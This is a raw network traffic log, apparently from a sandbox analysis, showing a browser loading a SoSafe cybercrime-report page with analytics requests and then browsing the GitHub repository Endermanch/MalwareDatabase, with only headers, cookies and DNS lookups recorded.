sec-fetch-dest: image
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:172.64.153.27:443RequestGET /cookie-banner-public/v1/cf-location HTTP/2.0
host: js.hs-banner.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://sosafe-awareness.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/plain;charset=UTF-8
content-length: 6
access-control-allow-origin: https://sosafe-awareness.com
cache-control: private, max-age=1500
vary: Origin, Accept-Encoding
server: cloudflare
cf-ray: 85d1f5e17cf276ff-LHR
-
Remote address:8.8.8.8:53Requestapi.hubapi.comIN AResponseapi.hubapi.comIN A104.17.204.204api.hubapi.comIN A104.17.202.204api.hubapi.comIN A104.17.200.204api.hubapi.comIN A104.17.203.204api.hubapi.comIN A104.17.201.204
-
Remote address:8.8.8.8:53Requestapi.hubapi.comIN A
-
Remote address:8.8.8.8:53Request186.80.16.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request89.187.16.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request83.154.19.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request27.153.64.172.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request14.42.107.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestin.requestmetrics.comIN AResponsein.requestmetrics.comIN A51.161.119.92in.requestmetrics.comIN A51.161.119.93
-
Remote address:51.161.119.92:443RequestPOST /v1?token=k3gg9vg:z3ei6ny&v=2.2.0 HTTP/2.0
host: in.requestmetrics.com
content-length: 32232
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://sosafe-awareness.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 202
date: Thu, 29 Feb 2024 15:32:32 GMT
content-type: application/octet-stream
content-length: 0
access-control-allow-methods: POST, OPTIONS
access-control-allow-origin: *
access-control-expose-headers: Content-Length,Content-Range
access-control-max-age: 86400
-
Remote address:8.8.8.8:53Request204.204.17.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request92.119.161.51.in-addr.arpaIN PTRResponse92.119.161.51.in-addr.arpaIN PTRprd-rm-1requestmetricsnet
-
Remote address:8.8.8.8:53Request92.119.161.51.in-addr.arpaIN PTRResponse92.119.161.51.in-addr.arpaIN PTRprd-rm-1requestmetricsnet
-
Remote address:8.8.8.8:53Requestgithub.comIN AResponsegithub.comIN A140.82.121.4
-
Remote address:140.82.121.4:443RequestGET /Endermanch/MalwareDatabase HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: document
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
date: Thu, 29 Feb 2024 15:32:45 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"c3c9c0c4eb3b4367bac93cc40a15cbfa"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
set-cookie: _gh_sess=khjbbUuNbo0OXHs4iEO%2BlZmNwN6ePoDJpEP%2B55fSkTqSKyRs0nuQfO4UUeewljqEqAMb%2FD3sDHCkfIx4N85tolHIGj5H%2FQhVbKW0amKNuHw9UaeKcPYQ%2BfDg5iPOMVYOX4rRa4vSkgrceQe8vDiJm4hIq5fmwMwnUb22JsHUgEQBFhW3QZNSnD31FwP1%2FRGDnd3K3xtIblZC1%2B8VrfjTZJiRZEaAY8xeDUufRihBOsFeM7gelZKecNqtImlP8OMExoVQzUvVs4uJBArPzQ6ZFQ%3D%3D--GvVXCMxa%2B55FfsJ%2B--y85iPPOgVDIcRtvoLPK0yQ%3D%3D; Path=/; HttpOnly; Secure; SameSite=Lax
set-cookie: _octo=GH1.1.664732354.1709220765; Path=/; Domain=github.com; Expires=Sat, 01 Mar 2025 15:32:45 GMT; Secure; SameSite=Lax
set-cookie: logged_in=no; Path=/; Domain=github.com; Expires=Sat, 01 Mar 2025 15:32:45 GMT; HttpOnly; Secure; SameSite=Lax
accept-ranges: bytes
x-github-request-id: DE97:126F1E:60424A2:619F3C5:65E0A39D
-
Remote address:140.82.121.4:443RequestGET /Endermanch/MalwareDatabase/security/overall-count HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: text/fragment+html
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=khjbbUuNbo0OXHs4iEO%2BlZmNwN6ePoDJpEP%2B55fSkTqSKyRs0nuQfO4UUeewljqEqAMb%2FD3sDHCkfIx4N85tolHIGj5H%2FQhVbKW0amKNuHw9UaeKcPYQ%2BfDg5iPOMVYOX4rRa4vSkgrceQe8vDiJm4hIq5fmwMwnUb22JsHUgEQBFhW3QZNSnD31FwP1%2FRGDnd3K3xtIblZC1%2B8VrfjTZJiRZEaAY8xeDUufRihBOsFeM7gelZKecNqtImlP8OMExoVQzUvVs4uJBArPzQ6ZFQ%3D%3D--GvVXCMxa%2B55FfsJ%2B--y85iPPOgVDIcRtvoLPK0yQ%3D%3D
cookie: _octo=GH1.1.664732354.1709220765
cookie: logged_in=no
cookie: preferred_color_mode=light
ResponseHTTP/2.0 200
date: Thu, 29 Feb 2024 15:32:47 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"75a11da44c802486bc6f65640aa48a73"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
x-html-safe: 1acd6d13f4d8f9d6cab65040ac3316bf2b7a8c8777308253038c27aeb609e9fe
accept-ranges: bytes
content-length: 33
x-github-request-id: DE97:126F1E:6042FA9:619FE8C:65E0A39E
-
GEThttps://github.com/Endermanch/MalwareDatabase/spoofed_commit_check/18497187aa0dc5af76852a256cd0a3fceb7c4ab9msedge.exeRemote address:140.82.121.4:443RequestGET /Endermanch/MalwareDatabase/spoofed_commit_check/18497187aa0dc5af76852a256cd0a3fceb7c4ab9 HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: text/html
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=khjbbUuNbo0OXHs4iEO%2BlZmNwN6ePoDJpEP%2B55fSkTqSKyRs0nuQfO4UUeewljqEqAMb%2FD3sDHCkfIx4N85tolHIGj5H%2FQhVbKW0amKNuHw9UaeKcPYQ%2BfDg5iPOMVYOX4rRa4vSkgrceQe8vDiJm4hIq5fmwMwnUb22JsHUgEQBFhW3QZNSnD31FwP1%2FRGDnd3K3xtIblZC1%2B8VrfjTZJiRZEaAY8xeDUufRihBOsFeM7gelZKecNqtImlP8OMExoVQzUvVs4uJBArPzQ6ZFQ%3D%3D--GvVXCMxa%2B55FfsJ%2B--y85iPPOgVDIcRtvoLPK0yQ%3D%3D
cookie: _octo=GH1.1.664732354.1709220765
cookie: logged_in=no
cookie: preferred_color_mode=light
ResponseHTTP/2.0 204
date: Thu, 29 Feb 2024 15:32:47 GMT
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
x-github-request-id: DE97:126F1E:6042FB8:619FE9E:65E0A39E
-
GEThttps://github.com/Endermanch/MalwareDatabase/hovercards/citation/sidebar_partial?tree_name=mastermsedge.exeRemote address:140.82.121.4:443RequestGET /Endermanch/MalwareDatabase/hovercards/citation/sidebar_partial?tree_name=master HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: text/html
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=khjbbUuNbo0OXHs4iEO%2BlZmNwN6ePoDJpEP%2B55fSkTqSKyRs0nuQfO4UUeewljqEqAMb%2FD3sDHCkfIx4N85tolHIGj5H%2FQhVbKW0amKNuHw9UaeKcPYQ%2BfDg5iPOMVYOX4rRa4vSkgrceQe8vDiJm4hIq5fmwMwnUb22JsHUgEQBFhW3QZNSnD31FwP1%2FRGDnd3K3xtIblZC1%2B8VrfjTZJiRZEaAY8xeDUufRihBOsFeM7gelZKecNqtImlP8OMExoVQzUvVs4uJBArPzQ6ZFQ%3D%3D--GvVXCMxa%2B55FfsJ%2B--y85iPPOgVDIcRtvoLPK0yQ%3D%3D
cookie: _octo=GH1.1.664732354.1709220765
cookie: logged_in=no
cookie: preferred_color_mode=light
ResponseHTTP/2.0 200
date: Thu, 29 Feb 2024 15:32:47 GMT
content-type: text/plain; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 20
x-github-request-id: DE97:126F1E:6042FBB:619FE9F:65E0A39E
-
Remote address:140.82.121.4:443RequestGET /Endermanch/MalwareDatabase/used_by_list HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: text/fragment+html
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=khjbbUuNbo0OXHs4iEO%2BlZmNwN6ePoDJpEP%2B55fSkTqSKyRs0nuQfO4UUeewljqEqAMb%2FD3sDHCkfIx4N85tolHIGj5H%2FQhVbKW0amKNuHw9UaeKcPYQ%2BfDg5iPOMVYOX4rRa4vSkgrceQe8vDiJm4hIq5fmwMwnUb22JsHUgEQBFhW3QZNSnD31FwP1%2FRGDnd3K3xtIblZC1%2B8VrfjTZJiRZEaAY8xeDUufRihBOsFeM7gelZKecNqtImlP8OMExoVQzUvVs4uJBArPzQ6ZFQ%3D%3D--GvVXCMxa%2B55FfsJ%2B--y85iPPOgVDIcRtvoLPK0yQ%3D%3D
cookie: _octo=GH1.1.664732354.1709220765
cookie: logged_in=no
cookie: preferred_color_mode=light
ResponseHTTP/2.0 200
date: Thu, 29 Feb 2024 15:32:47 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"27ad9379f8d0879f6d62fe8ef65a2c3d"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 84
x-github-request-id: DE97:126F1E:6043011:619FEEC:65E0A39E
-
Remote address:140.82.121.4:443RequestGET /Endermanch/MalwareDatabase/refs?type=branch HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: application/json
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=khjbbUuNbo0OXHs4iEO%2BlZmNwN6ePoDJpEP%2B55fSkTqSKyRs0nuQfO4UUeewljqEqAMb%2FD3sDHCkfIx4N85tolHIGj5H%2FQhVbKW0amKNuHw9UaeKcPYQ%2BfDg5iPOMVYOX4rRa4vSkgrceQe8vDiJm4hIq5fmwMwnUb22JsHUgEQBFhW3QZNSnD31FwP1%2FRGDnd3K3xtIblZC1%2B8VrfjTZJiRZEaAY8xeDUufRihBOsFeM7gelZKecNqtImlP8OMExoVQzUvVs4uJBArPzQ6ZFQ%3D%3D--GvVXCMxa%2B55FfsJ%2B--y85iPPOgVDIcRtvoLPK0yQ%3D%3D
cookie: _octo=GH1.1.664732354.1709220765
cookie: logged_in=no
cookie: preferred_color_mode=light
ResponseHTTP/2.0 200
date: Thu, 29 Feb 2024 15:32:47 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"8902c7088699d5c25402933819980cd9"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
